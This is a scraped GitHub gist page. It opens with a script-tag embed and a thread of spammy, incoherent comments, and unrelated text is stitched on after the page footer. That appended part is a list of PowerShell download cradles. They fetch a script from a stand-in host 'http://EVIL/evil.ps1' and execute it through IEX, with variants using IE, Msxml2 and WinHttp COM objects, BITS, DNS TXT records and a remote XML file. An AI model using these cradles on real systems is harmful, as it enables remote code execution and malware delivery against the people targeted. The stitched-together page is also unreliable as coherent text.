Created
April 28, 2011 13:19
-
-
Save mattn/946330 to your computer and use it in GitHub Desktop.
<script src=https://gist.github.com/raw/946328/gistfile1.txt ><\/script>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src=https://gist.github.com/raw/946328/gistfile1.txt ><\/script> |
<script src="https://gist.github.com/Watreni/b4e31ca33730ffe7259194cb3b385bb8.js"></script>
<script src="https://gist.github.com/ssmereka/6517444.js"></script>
<script src="https://gist.github.com/NathanXID/2fee8e4c5e6a082dc215f0da91cf7a5c.js"></script>
<script src="https://gist.github.com/leaky-coder/4f3c403adfbc7c925bbb239713428f39.js"></script>
<script src="https://gist.github.com/iNPUTmice/28113eecccf50dc81d266c4215cb1264.js"></script>
<script src="https://gist.github.com/martytyty2098/baf42f8ff0bfae517971448ee0cdae19.js"></script>
THIS ONE IS MINE !!!
<script src="https://gist.github.com/v1ck3/dcebc4ccd329d14f91e6886aa05b8fab.js"></script>Tsyfigg
Hi ugufrdhv
Vi hi ha sh hy r jhy
Yes nohgffi
Yes boss
Я тут с вами
<script src="https://gist.github.com/mattn/946330.js"></script>
guys what should i do with this file?
guys what should i do with this file?
Try to run test
<script src="https://gist.github.com/mattn/946330.js"></script>
What is the purpose?
<script src="https://gist.github.com/YONGOHM49/ce9e9adece65dba71b016af6c3925c40.js"></script>
on macOS and windows 8, and check out my gist: <script src="(=rap).
.js"></script
https://gist..git well I don’t know what I’m doing so don’t get upset with
me
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
from @subTee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
Get-Process #> $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex